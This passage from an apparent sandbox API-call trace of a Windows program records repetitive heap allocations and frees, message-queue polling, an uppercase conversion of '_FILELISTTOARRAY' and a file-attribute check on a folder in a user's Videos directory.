dwFlags=0x0, lpMem=0x4181388 | out: hHeap=0x1780000) returned 1 [0097.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0097.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0097.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0097.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0097.416] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0097.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0097.416] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0097.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0097.416] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0097.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0097.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0097.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0097.417] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0097.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0097.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0097.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0097.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24d0 [0097.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0097.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0097.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0097.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0097.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0097.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2370 [0097.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0097.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0097.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0097.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0097.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2450 [0097.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0097.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0097.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0097.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9dd0 [0097.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0097.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0097.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0097.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0097.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0097.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0097.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0097.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0097.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0097.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0097.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0097.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0097.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0097.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0097.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0097.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0097.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0097.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0097.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0097.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0097.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0097.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0097.418] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0097.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0097.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0097.419] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0097.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0097.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0097.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0097.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0097.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0097.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0097.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0097.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0097.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0097.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0097.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0097.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0097.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0097.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0097.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0097.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0097.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0097.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0097.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0097.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0097.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0097.419] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0097.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0097.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0097.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0097.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0097.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0097.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0097.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0097.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0097.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0097.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0097.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0097.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0097.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0097.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0097.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0097.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0097.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0097.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0097.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0097.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0097.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0097.420] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0097.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0097.420] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0097.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0097.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0097.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0097.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0097.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0097.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0097.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0097.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0097.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0097.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0097.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0097.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0097.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0097.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca130 [0097.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0097.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369dc8 [0097.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4a) returned 0x436a240 [0097.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0097.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0097.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0097.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0097.421] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0097.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0097.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0097.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0097.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0097.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0097.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0097.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0097.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369dc8 | out: hHeap=0x1780000) returned 1 [0097.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0097.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0097.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0097.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0097.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0097.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0097.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0097.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0097.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0097.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0097.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a80e8 [0097.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0097.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0097.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0097.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0097.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0097.423] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0097.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0097.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0097.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0097.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0097.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0097.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0097.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0097.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0097.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0097.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0097.423] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0097.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0097.423] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0097.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0097.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0097.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0097.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0097.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0097.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0097.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0097.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0097.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0097.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0097.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0097.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0097.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0097.424] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0097.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0097.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0097.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0097.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0097.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.424] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\" (normalized: "c:\\users\\fd1hvy\\videos\\96vxr96fljjml")) returned 0x10 [0097.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0097.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0097.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0097.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0097.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0097.425] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0097.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0097.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0097.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0097.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0097.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0097.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0097.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0097.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0097.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0097.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca010 [0097.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0097.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0097.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0097.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0097.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0097.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0097.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0097.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0097.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0097.426] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0097.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0097.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0097.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0097.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0097.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0097.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0097.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0097.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0097.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0097.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0097.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0097.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0097.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0097.426] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0097.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0097.427] HeapFree (in: 